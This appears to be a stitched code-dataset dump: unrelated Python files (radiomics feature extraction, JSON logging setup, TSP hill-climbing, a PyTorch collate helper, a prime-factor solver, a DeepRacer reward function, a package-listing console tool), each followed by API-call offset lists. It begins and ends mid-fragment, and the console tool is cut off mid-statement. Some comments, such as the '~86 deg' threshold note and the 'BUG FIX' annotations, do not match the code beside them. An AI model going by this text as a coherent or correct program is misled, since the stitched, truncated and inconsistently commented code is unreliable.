(['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (14531, 14565), False, 'from tests.helpers import get_test_record, user_login\n'), ((19188, 19237), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-1"""'], {}), "(testdata, 'documents', 'docid-1')\n", (19203, 19237), False, 'from tests.helpers import get_test_record, user_login\n'), ((19260, 19309), 'tests.helpers.get_test_record', 'get_test_record', (['testdata', '"""documents"""', '"""docid-6"""'], {}), "(testdata, 'documents', 'docid-6')\n", (19275, 19309), False, 'from tests.helpers import get_test_record, user_login\n'), ((22765, 22813), 'flask.url_for', 'url_for', (['api_endpoint'], {'pid_value': 'first_pid_value'}), '(api_endpoint, pid_value=first_pid_value)\n', (22772, 22813), False, 'from flask import url_for\n'), ((23031, 23050), 'json.dumps', 'json.dumps', (['payload'], {}), '(payload)\n', (23041, 23050), False, 'import json\n')]
|
import argparse
import os
import sys
import radiomics
import SimpleITK as sitk
import csv
import pandas as pd
# FreeSurfer aseg label names for which shape features are extracted.
# Each name is resolved to its numeric label id via the fs_lut.csv lookup table.
LABELS_FS = ['Left-Lateral-Ventricle', 'Left-Inf-Lat-Vent', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', '3rd-Ventricle',
             '4th-Ventricle', 'Brain-Stem', 'Left-Hippocampus', 'Left-Amygdala', 'Left-Accumbens-area', 'Left-VentralDC', 'Left-choroid-plexus',
             'Right-Lateral-Ventricle', 'Right-Inf-Lat-Vent', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen', 'Right-Pallidum', 'Right-Hippocampus',
             'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Right-choroid-plexus', '5th-Ventricle',
             'CC_Posterior', 'CC_Mid_Posterior', 'CC_Central', 'CC_Mid_Anterior', 'CC_Anterior']
# DL+DiReCT label names; entries of the form 'Name:id' carry an explicit
# numeric label id and bypass the fs_lut.csv lookup (see main()).
LABELS_DL = ['Left-Ventricle-all:101', 'Left-Thalamus-Proper', 'Left-Caudate', 'Left-Putamen', 'Left-Pallidum', 'Left-Hippocampus', 'Left-Amygdala',
             'Left-Accumbens-area', 'Left-VentralDC', 'Right-Ventricle-all:112', 'Right-Thalamus-Proper', 'Right-Caudate', 'Right-Putamen',
             'Right-Pallidum', 'Right-Hippocampus', 'Right-Amygdala', 'Right-Accumbens-area', 'Right-VentralDC', 'Brain-Stem',
             '3rd-Ventricle', '4th-Ventricle', 'Corpus-Callosum:125']
def lut_parse():
    """Load the FreeSurfer lookup table shipped next to this script.

    Reads ``fs_lut.csv`` from the script's own directory and returns a
    ``{Key: Label}`` mapping (label name -> numeric label id).
    """
    script_dir = os.path.dirname(os.path.realpath(sys.argv[0]))
    table = pd.read_csv('{}/fs_lut.csv'.format(script_dir))
    return dict(zip(table.Key, table.Label))
def main(subject_dirs, aseg_file, labels, results_csv):
    """Extract radiomics shape features for every subject and write a CSV.

    For each subject directory found under each entry of ``subject_dirs``,
    the segmentation image ``aseg_file`` is loaded and, for every label in
    ``labels``, pyradiomics shape features are computed. One CSV row per
    subject is written to ``results_csv``, with one column per
    ``<label>.<feature>`` pair.

    :param subject_dirs: directories each containing one sub-directory per subject
    :param aseg_file: path of the segmentation file, relative to the subject dir
    :param labels: label names; 'Name:id' entries carry an explicit label id,
                   otherwise the id is looked up in fs_lut.csv
    :param results_csv: output CSV path (overwritten)
    """
    LUT = lut_parse()
    print(results_csv)
    with open(results_csv, 'w') as out_file:
        writer = csv.writer(out_file, delimiter=',')
        # header is written once, from the first successfully processed subject;
        # every later subject must produce the identical field list (asserted below).
        header = None
        for subjects_dir in subject_dirs:
            for subject_name in os.listdir(subjects_dir):
                fname = '{}/{}/{}'.format(subjects_dir, subject_name, aseg_file)
                if not os.path.exists(fname):
                    print('{}: {} not found. Skipping'.format(subject_name, aseg_file))
                    continue
                print(subject_name)
                fields = list()
                values = list()
                img = sitk.ReadImage(fname)
                for label in labels:
                    if ':' in label:
                        # explicit numeric id encoded in the label name
                        label, label_id = label.split(':')
                    else:
                        label_id = LUT[label]
                    # silence pyradiomics logging (50 == CRITICAL only)
                    radiomics.setVerbosity(50)
                    # image is passed twice: once as intensity image, once as mask
                    shape_features = radiomics.shape.RadiomicsShape(img, img, **{'label': int(label_id)})
                    shape_features.enableAllFeatures()
                    results = shape_features.execute()
                    for key in results.keys():
                        fields.append('{}.{}'.format(label, key))
                        # a zero VoxelVolume means the label is absent -> 'nan'
                        values.append(float(results[key]) if results['VoxelVolume'] > 0 else 'nan')
                if header is None:
                    header = fields
                    writer.writerow(['Subject'] + header)
                else:
                    # all subjects must yield the same feature columns
                    assert header == fields
                writer.writerow([subject_name] + values)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Extract radiomics features from subjects')
    parser.add_argument(
        '--aseg_file',
        type=str,
        default='T1w_norm_seg.nii.gz',
        help='Path (relative to subject dir) of aseg segmentation file.'
    )
    parser.add_argument(
        '--labels',
        type=str,
        nargs='+',
        metavar='label',
        default=['DL'],
        help='List of labels. FreeSurfer ids (from fs_lut) are used per default. '
             'Can also be: label:id. Example: "Left-Hippocampus:9 Right-Hippocampus:21." '
             'Use "FS" for all FreeSurfer labels or "DL" for all DL+DiReCT labels'
    )
    parser.add_argument(
        '--results_csv',
        type=str,
        required=True,
        help='CSV-File to store results'
    )
    parser.add_argument(
        'subject_dirs',
        metavar='dir',
        type=str,
        nargs='+',
        help='Directories with subjects (FreeSurfer or DL+DiReCT results dir)'
    )
    args = parser.parse_args()

    # Validate every subject directory up front.
    # BUG FIX: the error message used `args.subjects_dir`, an attribute that
    # does not exist (the argparse dest is `subject_dirs`), so the failure
    # path itself raised AttributeError. Also renamed the loop variable,
    # which shadowed the builtin `dir`.
    for subjects_dir in args.subject_dirs:
        if not os.path.exists(subjects_dir):
            print('{} not found'.format(subjects_dir))
            sys.exit(1)

    # 'FS'/'DL' select a predefined label set; anything else is a custom list.
    labels = LABELS_FS if args.labels[0] == 'FS' else LABELS_DL if args.labels[0] == 'DL' else args.labels
    main(args.subject_dirs, args.aseg_file, labels, args.results_csv)
|
[
"radiomics.setVerbosity",
"csv.writer",
"argparse.ArgumentParser",
"os.path.realpath",
"SimpleITK.ReadImage",
"os.path.exists",
"os.listdir",
"sys.exit"
] |
[((3124, 3203), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Extract radiomics features from subjects"""'}), "(description='Extract radiomics features from subjects')\n", (3147, 3203), False, 'import argparse\n'), ((1600, 1635), 'csv.writer', 'csv.writer', (['out_file'], {'delimiter': '""","""'}), "(out_file, delimiter=',')\n", (1610, 1635), False, 'import csv\n'), ((1732, 1756), 'os.listdir', 'os.listdir', (['subjects_dir'], {}), '(subjects_dir)\n', (1742, 1756), False, 'import os\n'), ((4199, 4218), 'os.path.exists', 'os.path.exists', (['dir'], {}), '(dir)\n', (4213, 4218), False, 'import os\n'), ((4292, 4303), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (4300, 4303), False, 'import sys\n'), ((1346, 1375), 'os.path.realpath', 'os.path.realpath', (['sys.argv[0]'], {}), '(sys.argv[0])\n', (1362, 1375), False, 'import os\n'), ((2125, 2146), 'SimpleITK.ReadImage', 'sitk.ReadImage', (['fname'], {}), '(fname)\n', (2139, 2146), True, 'import SimpleITK as sitk\n'), ((1862, 1883), 'os.path.exists', 'os.path.exists', (['fname'], {}), '(fname)\n', (1876, 1883), False, 'import os\n'), ((2372, 2398), 'radiomics.setVerbosity', 'radiomics.setVerbosity', (['(50)'], {}), '(50)\n', (2394, 2398), False, 'import radiomics\n')]
|
from pythonjsonlogger import jsonlogger
from datetime import datetime
import logging
from logging import Logger
from logging.config import dictConfig
from seedwork.utils.functional import SimpleLazyObject
from seedwork.infrastructure.request_context import request_context
class RequestContextFilter(logging.Filter):
    """Logging filter that stamps every record with the current correlation id.

    The id is read from the supplied request context on each call, so log
    lines can be traced back to the request that produced them.
    """

    def __init__(self, name: str, request_context) -> None:
        super().__init__(name=name)
        self.request_context = request_context

    def filter(self, record):
        # Expose the id to formatters as %(correlation_id)s; never drop records.
        correlation_id = self.request_context.correlation_id.get()
        setattr(record, "correlation_id", correlation_id)
        return True
class ElkJsonFormatter(jsonlogger.JsonFormatter):
    """ELK-stack-compatible JSON formatter.

    Extends pythonjsonlogger's JsonFormatter so that every emitted JSON
    record carries the fields Elasticsearch/Logstash/Kibana expect:
    ``@timestamp``, ``level`` and ``logger``.
    """

    def add_fields(self, log_record, record, message_dict):
        super(ElkJsonFormatter, self).add_fields(log_record, record, message_dict)
        # NOTE(review): datetime.now() is naive local time — ELK usually
        # expects UTC; confirm before relying on cross-host ordering.
        log_record["@timestamp"] = datetime.now().isoformat()
        log_record["level"] = record.levelname
        log_record["logger"] = record.name
class LoggerFactory:
    """Builds the application logger from a dictConfig-style configuration.

    Call :meth:`configure` before the first logger access; otherwise
    :meth:`create_logger` falls back to the default configuration.
    """

    # set by configure(); create_logger() self-configures if still False
    _configured = False

    @classmethod
    def configure(
        cls,
        logger_name="app",
        log_filename="./logs.json",
        request_context=request_context,
    ):
        """Store the logger settings on the class for later create_logger() use.

        :param logger_name: name of the application logger
        :param log_filename: JSON log file path; falsy disables file logging
        :param request_context: provider of the per-request correlation id
        """
        cls.logger_name = logger_name
        cls.log_filename = log_filename
        cls.request_context = request_context
        cls._configured = True

    @classmethod
    def create_logger(cls):
        """
        Returns a logger instance, based on a configuration options
        """
        if not cls._configured:
            cls.configure()
        logging_config = {
            "version": 1,
            "disable_existing_loggers": False,
            "formatters": {
                "default": {
                    # exact format is not important, this is the minimum information
                    "format": "%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
                },
                "colored": {
                    "()": "colorlog.ColoredFormatter",
                    "format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
                    "log_colors": {
                        "DEBUG": "white",
                        "INFO": "green",
                        "WARNING": "yellow",
                        "ERROR": "red",
                        "CRITICAL": "red,bold",
                    },
                },
                "colored_db": {
                    "()": "colorlog.ColoredFormatter",
                    "format": "%(log_color)s%(asctime)s %(name)-12s %(levelname)-8s %(correlation_id)s %(message)s",
                    "log_colors": {
                        "DEBUG": "purple",
                        "INFO": "green",
                        "WARNING": "yellow",
                        "ERROR": "red",
                        "CRITICAL": "red,bold",
                    },
                },
                "json_formatter": {
                    "()": "seedwork.infrastructure.logging.ElkJsonFormatter",
                },
            },
            "handlers": {
                # console logs to stderr
                "console": {
                    "class": "logging.StreamHandler",
                    "formatter": "default",
                },
                "colored_console": {
                    "class": "colorlog.StreamHandler",
                    "formatter": "colored",
                },
                "colored_console_db": {
                    "class": "colorlog.StreamHandler",
                    "formatter": "colored_db",
                },
                # NOTE(review): when log_filename is falsy this leaves a
                # None handler entry in the dict — dictConfig may reject it;
                # confirm the no-file configuration path is actually used.
                "file_handler": {
                    "class": "logging.handlers.RotatingFileHandler",
                    "filename": cls.log_filename,
                    "formatter": "json_formatter",
                }
                if cls.log_filename
                else None,
                # Add Handler for Sentry for `warning` and above
                # 'sentry': {
                #     'level': 'WARNING',
                #     'class': 'raven.contrib.django.raven_compat.handlers.SentryHandler',
                # },
            },
            "loggers": {
                cls.logger_name: {
                    "level": "DEBUG",
                    "handlers": ["colored_console", "file_handler"],  # , 'sentry'],
                },
                # Prevent noisy modules from logging to Sentry
                "noisy_module": {
                    "level": "ERROR",
                    "handlers": ["console"],
                    "propagate": False,
                },
            },
        }
        dictConfig(logging_config)
        logger = logging.getLogger(name=cls.logger_name)
        # Stamp every record with the correlation id of the current request.
        logger.addFilter(
            RequestContextFilter(
                name=cls.logger_name, request_context=cls.request_context
            )
        )
        return logger
"""
We are making logger globally available, but to make it configurable logger lazy-evaluated.
Use `LoggerFactory.configure()` to configure the logger prior to its usage
"""
logger = SimpleLazyObject(LoggerFactory.create_logger)
|
[
"datetime.datetime.now",
"logging.config.dictConfig",
"logging.getLogger",
"seedwork.utils.functional.SimpleLazyObject"
] |
[((5120, 5165), 'seedwork.utils.functional.SimpleLazyObject', 'SimpleLazyObject', (['LoggerFactory.create_logger'], {}), '(LoggerFactory.create_logger)\n', (5136, 5165), False, 'from seedwork.utils.functional import SimpleLazyObject\n'), ((4670, 4696), 'logging.config.dictConfig', 'dictConfig', (['logging_config'], {}), '(logging_config)\n', (4680, 4696), False, 'from logging.config import dictConfig\n'), ((4714, 4753), 'logging.getLogger', 'logging.getLogger', ([], {'name': 'cls.logger_name'}), '(name=cls.logger_name)\n', (4731, 4753), False, 'import logging\n'), ((932, 946), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (944, 946), False, 'from datetime import datetime\n')]
|
import math
import random
import numpy
from tools import *
'''
Parametric Optimizers to search for optimal TSP solution.
Method 1: Stochastic Hill Climbing search
Method 2: Random Search - Used as benchmark
'''
# Build one member of the population: a random tour over the cities.
def createPath(m):
    """Return a random permutation of the city labels 1..m as a numpy array."""
    return numpy.random.permutation(numpy.arange(1, m + 1))
# Perform a stochastic hill climbing search with random restarts.
# Records 1/best-fitness (i.e. the best tour length seen so far, assuming
# fitnessShort returns the reciprocal of tour length — confirm in tools)
# whenever the evaluation counter hits a value listed in `inter`.
def stochClimb(points,bound,inter):
    p = len(points)
    # ctr counts fitness function evaluations; bound is the evaluation budget
    ctr = 0
    # samples of 1/maxfit taken at each checkpoint in inter
    data = []
    # best fitness seen so far across all restarts
    maxfit = 0.0
    while (ctr < bound):
        # Random restart: fresh tour and its fitness
        v = createPath(p)
        f = fitnessShort(v,points)
        if (f > maxfit):
            maxfit = f
        ctr += 1
        if (ctr in inter):
            data.append(1.0/maxfit)
        if (ctr >= bound):
            return data
        # Index arrays used to pick swap pairs in random order
        o = numpy.arange(v.size)
        i = numpy.arange(v.size)
        while (ctr < bound):
            climbed = False
            numpy.random.shuffle(o)
            numpy.random.shuffle(i)
            for x in range(o.size):
                for y in range(i.size):
                    # Tentatively swap two cities; keep the swap only if it improves f
                    swap(v,o[x],i[y])
                    shot = fitnessShort(v,points)
                    ctr += 1
                    if (shot <= f):
                        # no improvement: undo the swap
                        swap(v,o[x],i[y])
                    else:
                        f = shot
                        climbed = True
                    if (ctr in inter):
                        if (shot > maxfit):
                            maxfit = shot
                        data.append(1.0/maxfit)
                    if (ctr >= bound):
                        return data
            # If no improvement made, local optimum reached
            # Return solution, otherwise keep trying to climb
            if (not climbed):
                break
        else:
            # while/else: runs only when the inner loop exits without `break`,
            # i.e. the budget forced us out while still improving
            if (f > maxfit):
                maxfit = f
# Pure random search — the benchmark the hill climber is compared against.
def randSearch(points,bound,inter):
    """Sample `bound` random tours; at each evaluation count listed in
    `inter`, record 1/best-fitness-so-far. Returns the recorded samples."""
    num_cities = len(points)
    samples = []
    best_fitness = 0.0
    for evals in range(1, bound + 1):
        candidate = createPath(num_cities)
        best_fitness = max(best_fitness, fitnessShort(candidate, points))
        if evals in inter:
            samples.append(1.0 / best_fitness)
    return samples
|
[
"numpy.arange",
"numpy.random.shuffle"
] |
[((290, 312), 'numpy.arange', 'numpy.arange', (['(1)', '(m + 1)'], {}), '(1, m + 1)\n', (302, 312), False, 'import numpy\n'), ((312, 335), 'numpy.random.shuffle', 'numpy.random.shuffle', (['n'], {}), '(n)\n', (332, 335), False, 'import numpy\n'), ((840, 860), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (852, 860), False, 'import numpy\n'), ((869, 889), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (881, 889), False, 'import numpy\n'), ((943, 966), 'numpy.random.shuffle', 'numpy.random.shuffle', (['o'], {}), '(o)\n', (963, 966), False, 'import numpy\n'), ((973, 996), 'numpy.random.shuffle', 'numpy.random.shuffle', (['i'], {}), '(i)\n', (993, 996), False, 'import numpy\n')]
|
from typing import Dict, List, Optional, Union
import torch
from ..torch_utils import padded_stack
def stack_arrays_as_dict(
    batch: List[Optional[torch.Tensor]], pad: bool = True
) -> Optional[
    Union[
        torch.Tensor,
        Dict[str, Union[Optional[torch.Tensor], Optional[List[Optional[torch.Tensor]]]]],
        List[Optional[torch.Tensor]],
    ]
]:
    """Stack a list of optional tensors into either a single tensor or a set of ragged tensors.
    NOTE: Should be used within the collate function, otherwise "__root__" doesn't really make sense.
    Args:
        batch (List[Optional[torch.Tensor]]): The batch of tensors to stack.
        pad (bool, optional): If the tensors should be stacked as a ragged set, or as a single tensor. Defaults to True.
    Returns:
        Optional[ Union[
            torch.Tensor,
            Dict[str, Union[Optional[torch.Tensor],Optional[List[Optional[torch.Tensor]]]]],
            List[Optional[torch.Tensor]], ] ]: The stacked/ragged tensors
    """
    # If the input shape is the same for every element in the batch, stack the arrays, else pad the arrays to the
    # same shape.
    # proto is the first non-None tensor; None entries are replaced with zeros
    # shaped like it.
    proto_s = [b for b in batch if b is not None]
    if not proto_s:
        # all-None batch: nothing to stack
        return [None] * len(batch)
    proto = proto_s[0]
    # Case 1: every tensor has the identical shape -> plain torch.stack.
    if all([x is None or x.shape == proto.shape for x in batch]):
        if pad:
            # "seqlen" assumes dim 0 is the sequence axis — TODO confirm;
            # would fail for 0-d tensors.
            return {
                "__root__": torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0),
                "seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch]),
            }
        return torch.stack([x if x is not None else torch.zeros_like(proto_s[0]) for x in batch], dim=0)
    # Case 2: shapes agree on all but the first axis -> ragged pad via
    # padded_stack (project helper; presumably returns (padded, lengths)).
    if all([x is None or x.shape[1:] == proto.shape[1:] for x in batch]):
        if pad:
            # Pad the first axis, and return sequence lengths
            # None entries become an empty (0, *trailing) tensor of proto's dtype
            tensors = [x if x is not None else torch.zeros(*proto.shape[1:]).to(proto.dtype) for x in batch]
            d, s = padded_stack(tensors)
            return {"__root__": d, "seqlen": s}
    # Case 3: fully ragged — return the raw list (optionally with lengths).
    # NOTE: also reached when pad=False in case 2.
    # TODO: Correct the return types on this data
    if pad:
        return {"__root__": batch, "seqlen": torch.tensor([x.shape[0] if x is not None else 0 for x in batch])}
    return batch
|
[
"torch.zeros",
"torch.zeros_like",
"torch.tensor"
] |
[((2175, 2242), 'torch.tensor', 'torch.tensor', (['[(x.shape[0] if x is not None else 0) for x in batch]'], {}), '([(x.shape[0] if x is not None else 0) for x in batch])\n', (2187, 2242), False, 'import torch\n'), ((1530, 1597), 'torch.tensor', 'torch.tensor', (['[(x.shape[0] if x is not None else 0) for x in batch]'], {}), '([(x.shape[0] if x is not None else 0) for x in batch])\n', (1542, 1597), False, 'import torch\n'), ((1663, 1691), 'torch.zeros_like', 'torch.zeros_like', (['proto_s[0]'], {}), '(proto_s[0])\n', (1679, 1691), False, 'import torch\n'), ((1450, 1478), 'torch.zeros_like', 'torch.zeros_like', (['proto_s[0]'], {}), '(proto_s[0])\n', (1466, 1478), False, 'import torch\n'), ((1916, 1945), 'torch.zeros', 'torch.zeros', (['*proto.shape[1:]'], {}), '(*proto.shape[1:])\n', (1927, 1945), False, 'import torch\n')]
|
#!/usr/bin/python3
import math
def is_prime2(n: int) -> bool:
    """Return True iff n is prime.

    Uses trial division only up to floor(sqrt(n)) — the original version
    tested every divisor up to n-1, which is O(n) and makes large inputs
    (e.g. the Project Euler target below) effectively un-checkable.
    Values below 2 (including negatives) are not prime.
    """
    if n < 2:
        return False
    i = 2
    while i * i <= n:
        if n % i == 0:
            return False
        i += 1
    return True
def prime_factors(n: int) -> list:
    """Return the distinct prime factors of n, largest first.

    BUG FIXES over the previous version:
    * cofactors above sqrt(n) were never tested, so e.g. prime_factors(10)
      returned [2] instead of [5, 2];
    * `if is_prime2(n): primes.append(i)` appended the small divisor i when
      n itself was prime, so prime inputs yielded [1].
    """
    def _is_prime(k):
        # Local sqrt-bounded trial-division test (keeps this function
        # self-contained and fast enough for the divisors examined here).
        if k < 2:
            return False
        d = 2
        while d * d <= k:
            if k % d == 0:
                return False
            d += 1
        return True

    found = set()
    i = 1
    while i * i <= n:
        if n % i == 0:
            # check both members of the divisor pair (i, n // i)
            for divisor in (i, n // i):
                if _is_prime(divisor):
                    found.add(divisor)
        i += 1
    # Descending order preserves the original contract that index 0 is the
    # largest prime factor (used by solve()).
    return sorted(found, reverse=True)
def solve(n: int) -> int:
    """Return the largest prime factor of n (Project Euler problem 3)."""
    factors = prime_factors(n)
    return factors[0]
if __name__ == '__main__':
    # Project Euler problem 3: largest prime factor of 600851475143.
    print(solve(600851475143))
|
[
"math.sqrt"
] |
[((294, 306), 'math.sqrt', 'math.sqrt', (['n'], {}), '(n)\n', (303, 306), False, 'import math\n')]
|
def reward_function(params):
    '''
    Cosine reward function for heading angle.

    The reward is a centre-line distance term, scaled by the cosine of the
    heading *error* (difference between the car's heading and the local
    track direction), plus a progress bonus every 100 steps. Going off
    track voids the reward.
    '''
    # Import libraries
    import math

    # PARAMETERS (CONSTANTS)
    # Total num of steps we want the car to finish the lap, it will vary depends on the track length
    TOTAL_NUM_STEPS = 300
    # Minimum accepted value of the scaled cosine term (~86 deg of error).
    COS_THRESHOLD = 0.1213

    # Read input parameters (unused reads of steering_angle/speed removed)
    distance_from_center = params['distance_from_center']
    track_width = params['track_width']
    steps = params['steps']
    progress = params['progress']
    all_wheels_on_track = params['all_wheels_on_track']
    waypoints = params['waypoints']
    closest_waypoints = params['closest_waypoints']
    heading = params['heading']

    # Calculate 3 markers that are at varying distances away from the center line
    marker_1 = 0.1 * track_width
    marker_2 = 0.25 * track_width
    marker_3 = 0.5 * track_width

    # Give higher reward if the agent is closer to center line and vice versa
    if distance_from_center <= marker_1:
        reward = 1
    elif distance_from_center <= marker_2:
        reward = 0.5
    elif distance_from_center <= marker_3:
        reward = 0.1
    else:
        reward = 1e-3  # likely crashed/ close to off track

    # Calculate the direction of the center line based on the closest waypoints
    next_point = waypoints[closest_waypoints[1]]
    prev_point = waypoints[closest_waypoints[0]]
    # atan2(dy, dx) gives the track direction in (-pi, pi); convert to degrees
    track_angle = math.degrees(
        math.atan2(next_point[1] - prev_point[1], next_point[0] - prev_point[0])
    )

    # BUG FIX: score the heading error (heading - track_angle). The previous
    # code used the SUM of the two angles, which penalised a car driving
    # perfectly along any non-horizontal track segment. cos is rescaled so a
    # perfect heading gives 1.0 (cos*3 - 2, i.e. 0.1 at ~86 deg of error);
    # cos() is periodic, so no extra wrap-around normalisation is needed.
    cos_value = math.cos(math.radians(heading - track_angle)) * 3.0 - 2.0

    # Penalize the reward if the heading error is too large
    if cos_value < COS_THRESHOLD:
        reward *= 0.01
    else:
        reward *= cos_value

    # Give additional reward if the car pass every 100 steps faster than expected
    if (steps % 100) == 0 and progress > (steps / TOTAL_NUM_STEPS) * 100:
        reward += progress / 100.0

    # Penalize if the car goes off track
    if not all_wheels_on_track:
        reward = 1e-3

    return float(reward)
# Smoke test: car centred on a straight horizontal segment with matching
# heading — expected output is the maximum base reward, 1.0.
print(reward_function({
    'distance_from_center': 0
    ,'track_width': 10
    ,'steering_angle': 0
    ,'speed': 1
    ,'steps': 0
    ,'progress': 0
    ,'all_wheels_on_track': True
    ,'waypoints':[(100,100),(150,100)]
    ,'closest_waypoints':[0,1]
    ,'heading': 0
    }))
|
[
"math.radians",
"math.degrees",
"math.atan2"
] |
[((1884, 1956), 'math.atan2', 'math.atan2', (['(next_point[1] - prev_point[1])', '(next_point[0] - prev_point[0])'], {}), '(next_point[1] - prev_point[1], next_point[0] - prev_point[0])\n', (1894, 1956), False, 'import math\n'), ((2002, 2027), 'math.degrees', 'math.degrees', (['track_angle'], {}), '(track_angle)\n', (2014, 2027), False, 'import math\n'), ((2087, 2122), 'math.radians', 'math.radians', (['(heading + track_angle)'], {}), '(heading + track_angle)\n', (2099, 2122), False, 'import math\n')]
|
"""
.. module:: console
:platform: Unix, Windows
:synopsis: Cilantropy entry-point for console commands
:mod:`console` -- Cilantropy entry-point for console commands
==================================================================
"""
from .helpers import get_shared_data
from .helpers import get_pkg_res
from .helpers import get_pypi_search
from .helpers import get_pypi_releases
from .helpers import parse_dict
from .helpers import get_kv_colored
from .helpers import get_field_formatted
from .helpers import create_paste_template
from . import metadata
from .settings import __version__
from .settings import __author__
from .settings import __author_url__
from .settings import TEKNIK_PASTE_API
from flask import json
from docopt import docopt
import urllib
import urllib.request
from colorama import init
from colorama import Fore
from colorama import Back
from colorama import Style
import pkg_resources
def cmd_show(args, short=False):
    """Implements the ``plp show`` command.

    Prints the project header, summary and metadata fields; unless
    ``short`` is True it also prints the location, requirements and
    console scripts.

    :param args: the docopt parsed arguments
    :param short: print only header/summary/fields when True
    :raises RuntimeError: if the project is not installed
    """
    proj_name = args["<project_name>"]
    try:
        pkg_dist = get_pkg_res().get_distribution(proj_name)
    except Exception:
        # BUG FIX: the original concatenated the message to print()'s return
        # value (None + str -> TypeError), so neither the error message nor
        # the RuntimeError below was ever produced.
        print(
            Fore.RED
            + Style.BRIGHT
            + "Error: unable to locate the project '%s' !" % proj_name
        )
        raise RuntimeError("Project not found !")
    try:
        pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
    except FileNotFoundError:
        # Fall back to the alternate metadata file name. (The third,
        # duplicated `except FileNotFoundError` of the old code was
        # unreachable and has been removed.)
        pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
    parsed, key_known = metadata.parse_metadata(pkg_metadata)
    distinfo = metadata.metadata_to_dict(parsed, key_known)

    # Header line: "<name> <version>", then the one-line summary.
    proj_head = Fore.GREEN + Style.BRIGHT + pkg_dist.project_name
    proj_head += Fore.YELLOW + Style.BRIGHT + " " + pkg_dist.version
    print(proj_head)  # BUG FIX: stray trailing comma removed (py2 leftover)
    proj_sum = Fore.WHITE + Style.DIM
    proj_sum += "- " + parse_dict(distinfo, "summary", True)
    print(proj_sum)

    # Remove long fields and fields already shown in the header.
    for used_key in ("description", "summary", "name", "version"):
        distinfo.pop(used_key, None)

    # Classifiers are long: print them last, and only in full output.
    classifier = distinfo.pop("classifier", None)

    for key in distinfo:
        print(get_field_formatted(distinfo, key))
    if short:
        return

    print()
    print(get_kv_colored("location", pkg_dist.location))
    requires = pkg_dist.requires()
    if len(requires) == 0:
        print(get_kv_colored("requires", "none"))
    else:
        req_text = "\n"
        for req in requires:
            req_text += " " * 4 + str(req) + "\n"
        print(get_kv_colored("requires", req_text))

    entry_points = pkg_dist.get_entry_map()
    console_scripts = entry_points.get("console_scripts")
    if console_scripts:
        console_scr_text = Fore.WHITE + Style.BRIGHT + " Console Scripts:" + "\n"
        for name, entry in console_scripts.items():
            console_scr_text += (
                Fore.YELLOW + Style.BRIGHT + " " * 4 + name + Fore.WHITE + Style.BRIGHT
            )
            console_scr_text += (
                " -> "
                + Fore.GREEN
                + Style.BRIGHT
                + entry.module_name
                + ":"
                + ",".join(entry.attrs)
                + "\n"
            )
        print(console_scr_text)

    if classifier:
        distinfo["classifier"] = classifier
        print(get_field_formatted(distinfo, "classifier"))
def cmd_list_detail(dist, distinfo):
    """Print one distribution in the detailed (multi-line) list format."""
    header = (Fore.GREEN + Style.BRIGHT + dist.project_name
              + Fore.YELLOW + Style.BRIGHT + " " + dist.version)
    print(header)
    summary = Fore.WHITE + Style.DIM + "- " + parse_dict(distinfo, "summary", True)
    print(summary)
    print(get_field_formatted(distinfo, "Author"))
    author_email = distinfo.get("author-email")
    # print("") emits the same bare newline the old explicit else-branch did
    print("<%s>" % author_email if author_email else "")
    for field in ("Home-page", "License", "Platform"):
        print(get_field_formatted(distinfo, field))
def cmd_list_compact(dist, distinfo):
    """Print one distribution as a single aligned row (compact list format)."""
    left = (Fore.GREEN + Style.BRIGHT + dist.project_name.ljust(25)
            + Fore.WHITE + Style.BRIGHT + " " + dist.version.ljust(12))
    summary = Fore.WHITE + Style.DIM + " " + parse_dict(distinfo, "summary", True)
    # One print emits exactly what the old pair of prints (end="") produced.
    print(left + summary.ljust(100))
def cmd_list(args):
    """Implements the ``plp list`` command.

    :param args: the docopt parsed arguments (``--compact`` flag and
                 optional ``<filter>`` substring)
    """
    compact = args["--compact"]
    filt = args["<filter>"]
    distributions = get_shared_data()["distributions"]
    if compact:
        print(
            Fore.YELLOW
            + Style.BRIGHT
            + "Project Name".ljust(26)
            + "Version".ljust(14)
            + "Summary"
        )
        print("-" * 80)
    for dist in distributions:
        # Optional case-insensitive substring filter on the project name.
        if filt and filt.lower() not in dist.project_name.lower():
            continue
        pkg_dist = get_pkg_res().get_distribution(dist.key)
        try:
            pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[0])
        except FileNotFoundError:
            # Fall back to the alternate metadata file name. (The duplicated
            # third `except FileNotFoundError` of the old code was
            # unreachable and has been removed.)
            pkg_metadata = pkg_dist.get_metadata(metadata.METADATA_NAME[1])
        parsed, key_known = metadata.parse_metadata(pkg_metadata)
        distinfo = metadata.metadata_to_dict(parsed, key_known)
        if compact:
            cmd_list_compact(dist, distinfo)
        else:
            cmd_list_detail(dist, distinfo)
def cmd_check(args):
    """Implements the ``plp check`` command: compares the installed version
    of a project with the releases published on PyPI.

    :param args: the docopt parsed arguments
    """
    proj_name = args["<project_name>"]
    cmd_show(args, short=True)
    print()
    print(Fore.GREEN + Style.BRIGHT + "Searching for updates on PyPI...")
    print()
    pkg_dist_version = get_pkg_res().get_distribution(proj_name).version
    pypi_rel = get_pypi_releases(proj_name)
    if pypi_rel:
        pypi_last_version = get_pkg_res().parse_version(pypi_rel[0])
        current_version = get_pkg_res().parse_version(pkg_dist_version)
        try:
            version_index = pypi_rel.index(pkg_dist_version)
        except ValueError:
            # BUG FIX: was a bare `except:`; list.index only raises
